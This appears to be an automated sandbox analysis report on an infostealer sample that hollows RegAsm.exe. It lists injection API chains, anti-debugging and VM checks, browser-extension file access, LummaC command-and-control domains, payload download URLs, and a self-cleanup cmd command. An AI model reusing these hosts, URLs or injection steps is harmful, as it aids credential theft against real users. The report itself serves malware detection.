Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	3_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	3_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

3_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410FBA GetSystemInfo,wsprintfA,

3_2_00410FBA

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: S------/5.75.211.162jhgfsd.exent-Disposition: form-data; name="token"
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.0000000001342000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: https://dbsmena.com/ljhgfsd.exe
Source: RegAsm.exe, 00000003.00000002.2384321664.000000000125A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1219741\|https://dbsmena.com/ljhgfsd.exe\|1\|kkkk\|1219742\|https://dbsmena.com/vdshfd.exe\|1\|kkkk\|
Source: RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: RegAsm.exe, 00000003.00000002.2384321664.000000000125A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWPg,
Source: RegAsm.exe, 00000003.00000002.2384321664.0000000001342000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: https://dbsmena.com/ljhgfsd.exe"
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: jhgfsd.exe
Source: RegAsm.exe, 0000000D.00000002.2704852578.000000000121A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWxj(
Source: RegAsm.exe, 0000000D.00000002.2704852578.000000000121A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: RegAsm.exe, 00000003.00000002.2384321664.00000000012BF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2415665979.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2414270008.00000000015C5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 00000003.00000002.2384321664.0000000001342000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: RegAsm.exe, 00000003.00000002.2384321664.00000000012BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: RegAsm.exe, 00000003.00000002.2393077836.0000000019CF6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.0000000001342000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /ljhgfsd.exe
Source: RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: Rhttps://dbsmena.com/ljhgfsd.exeent-Disposition: form-data; name="token"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_3-60447
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_3-60463
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_3-61778

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 9_2_004476D0 LdrInitializeThunk,

9_2_004476D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

3_2_0041D016

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_00418950

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004014AD mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040148A mov eax, dword ptr fs:[00000030h]	3_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h]	3_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00418599 mov eax, dword ptr fs:[00000030h]	3_2_00418599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041859A mov eax, dword ptr fs:[00000030h]	3_2_0041859A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040884C CopyFileA,GetProcessHeap,RtlAllocateHeap,StrCmpCA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,DeleteFileA,

3_2_0040884C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041D016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041D98C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042762E SetUnhandledExceptionFilter,	3_2_0042762E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C04B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6C04B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C04B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C04B1F7

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 7408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7476, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0272212D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_0272212D

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior

LummaC encrypted strings found

Source: CBFBKFIDHI.exe, 00000007.00000002.2304480133.00000000040B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: reinforcenh.shop
Source: CBFBKFIDHI.exe, 00000007.00000002.2304480133.00000000040B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stogeneratmns.shop
Source: CBFBKFIDHI.exe, 00000007.00000002.2304480133.00000000040B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: fragnantbui.shop
Source: CBFBKFIDHI.exe, 00000007.00000002.2304480133.00000000040B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: drawzhotdog.shop
Source: CBFBKFIDHI.exe, 00000007.00000002.2304480133.00000000040B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: vozmeatillu.shop
Source: CBFBKFIDHI.exe, 00000007.00000002.2304480133.00000000040B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: offensivedzvju.shop
Source: CBFBKFIDHI.exe, 00000007.00000002.2304480133.00000000040B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ghostreedmnu.shop
Source: CBFBKFIDHI.exe, 00000007.00000002.2304480133.00000000040B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: gutterydhowi.shop

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_0041257F

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C3F008	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44D000	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 460000	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1090008	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: EFA008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\CBFBKFIDHI.exe "C:\ProgramData\CBFBKFIDHI.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KJEHJKJEBG.exe "C:\ProgramData\KJEHJKJEBG.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BAECFHJEBAAF" & exit	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040111D cpuid

3_2_0040111D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	3_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_0042B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	3_2_0042B1C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00429A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	3_2_0042B268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	3_2_0042B2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	3_2_0042AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	3_2_004253E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_0042B494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	3_2_0042749C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesA,	3_2_0042B556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00429D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	3_2_0042E56F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_00427576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_00428DC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	3_2_0042B623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,	3_2_0042E6A4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\CBFBKFIDHI.exe	Queries volume information: C:\ProgramData\CBFBKFIDHI.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\KJEHJKJEBG.exe	Queries volume information: C:\ProgramData\KJEHJKJEBG.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041C0E9 lstrcpyA,GetLocalTime,SystemTimeToFileTime,

3_2_0041C0E9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,

3_2_00410C53

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

